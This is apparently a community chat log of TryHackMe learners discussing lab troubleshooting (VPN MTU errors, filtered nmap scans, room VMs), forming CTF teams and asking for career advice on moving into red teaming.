Hi guys, this is my first time solving a problem on try hack me and I'm already stuck on a basic pentesting task. As I understand it, first you need to scan the ports, I did everything as from the video. 1 what did the person in the video do, he pinged the iPad, it seemed like a delay, but 100 percent packet loss is writing to me. I decide to scan the ports via nmap -Pn -sT and nmap -Pn -sU, but it says that all ports are filtered. Maybe I don't understand something, maybe it's some kind of technical problem, but I really ask for someone's help. 🙏
You should be able to ping the target IP address. Have you tried traceroute to the target IP?
and how to do it?
traceroute target_ip
Log in to our private messages
?
I sent you a private message with the result.
Hey, I'm having issues connecting to the THM VPN. The troubleshooting script (thm-troubleshoot) stops with an error about MTU.
What I see when I run it:
[+] Stable internet connection
[+] OpenVPN is installed
[+] tun0 exists
[+] tun0 IP is in the correct range
[+] Only one instance of OpenVPN is running
[+] Confirming connectivity
MTU value failed at 1000, aborting MTU check
Something went wrong -- please ask for further assistance...
I'm on Kali Linux. My internet is fine, the VPN connects (I get a tun0 interface with an IP like 10.10.x.x), but something with the MTU check fails. Can you help?
Also having the same issue
Yo
Yo
Wassup
Hello everyone, well, this is just something I want to do actually. Soo basically I want to have a group of both newbies and experienced people in the world of cybersecurity, mainly red teaming and penetration testing, so we can all learn together and build ourselves. I know some might have some contradictory opinions but it's just what I think works. Soo anyone interested?
@xul Hii which room are you on ?
I mainly want to do red teaming and penetration testing, but before that I want to work as a SOC Analyst to gain experience
Is it just me or none of the network rooms for AD on THM work?
Heyy guys today i got the Advent of Cyber rewards and i have got 75$ voucher but i am not able to utilize it cause i already have the premium so if anyone wants it .
Dm me .
Interested in learning this career path. I am definitely at the beginner stage but I am focused and willing to learn!
@marble pecan can i join?
What are the best rooms to start learning the red team?
have you completed basic?
if yes then go to skill matrices and click on red teaming you'll see the room that are required to do red teaming
Can anyone help me to perform some action on a website , I have the vulnerability but don't know how to exploit
Is this a live / production environment or a lab one?
hello i am newbie and looking forward to join the CTF or Bug bounty team as a beginner to learn from senior and to make friend in same profession , anyone please DM me if you are in any team willing to take me in 🙂
me too
s
First Learn To ask not demand
You're a newbie
On The top
Take an analogy
Well rivers and anything don't come to
thirsty thirsty have to go there I hope you got it
😁
Hello good people, how y’all doing, am lost in this field , please i need help 😔💔
me too
I’m looking for someone skilled in reverse engineering I’m paying good money
Hi! I’m looking for three people to join a small CTF team. I’d prefer if you’re 15 or younger and live in a time zone that’s at most ±2 hours from Finland (UTC+0, UTC+1, UTC+2 or UTC+3). The goal isn’t to jump into competitions right away — first we’d get to know each other, practice together, and build a good team dynamic. I’m a beginner and want to improve step by step toward intermediate‑level CTFs. If you’re interested in learning and practicing together, feel free to message me!
Well If You Post Like This You Ain't Gonna Find
If You're Willing And Able To Work Consistent Then Join My Team You will Be In Probation for SomeTime
Google it
It varies based on location. Not certain if intern experience is considered though.
Extremely new to red teaming currently learning Linux and bash, next I will do power shell and python then c/c++ I want to do this for college and job if anyone is willing or wanting to work with me on random stuff or learn together just dm me please speak good English
Hello! Hoping to find some help with the Room "Custom Tooling using Burp" under Web Application Red Teaming. I am struggling with getting the "SECOND_VM_IP". I started the target VM, then the AttackBox. They say "You can find and start the second VM from this room(which is a link). We will use the IP address of the second VM as SECOND_VM_IP in this room." When I go to that room it tells me the VM is not in my region. Anyone else run into this? Thanks!
@Xul I am interested in red teaming as well; however, I am also new to Discord and do not know how to form groups.
Is anyone else on here interested in full-spectrum red teaming?
guys i am confused when im trying to gain root access after finding the setImpersonator is enabled
what is the free path to learn red teaming of web??
Also having this problem
Struggling with the windowsprivesc20 room, task 4.
For some reason i cant get a connect back, tried making the thing just echo some text as well and it seems to do nothing, its the right path according to schtask so im not sure what i could be doing wrong 🙈 anyone know?
I am interested
Hi everyone, I need some advice.
I've been in IT for 2 years, my background is mostly in infrastructure, servers (Windows & Linux), services, and now I'm working more as support in a SaaS company, but it's not a very technical role.
I realized I don't like very repetitive things like handling tickets, so I put my profile and the cybersecurity areas that best fit me into Claude's system, and they were all geared towards red team.
I feel like I don't have a strong foundation yet (OS, NETWORK, and WEB), but I have experience.
I want advice on migrating and studying for the red team area, especially with this AI "hype".
You’re actually in a solid spot already with the infra + server background—that’s more relevant to red teaming than you probably think.
The main gap you called out (OS, networking, web foundations) is real though, and that’s what will slow you down if you skip it.
I’d follow the THM roadmap, but specifically:
→ Pre Security → Cyber Security 101 (to clean up fundamentals)
→ Then go straight down the Pentester path (Jr Pentester → Web → Red Teaming)
Don’t treat it like “just courses” though—focus on:
really understanding networking (this is huge for red team)
getting comfortable with Linux + Windows internals
then Active Directory once you hit the red team path
Since you already have infra experience, that’ll click faster for you—especially AD attacks and lateral movement.
Also mix in hands-on stuff early (THM labs / HTB), otherwise it’ll feel like theory grind.
If you stay consistent on that path, you’ll have a much clearer transition into red team vs bouncing around randomly.
If you look at this roadmap (attached image), the path highlighted in green is basically what I’d recommend—foundations first, then straight down the pentester track into red teaming.
Thank you, that helps a lot.
Yes, I have that background, but now I want to focus on really having that solid foundation to specialize in.
I WILL take the Pre-Security course.
DM me if you have any questions about the course. I finished it, so I probably will be able to help.
@true oyster Security analysts pay a significant role in an organization....? What is the answer to that question ❓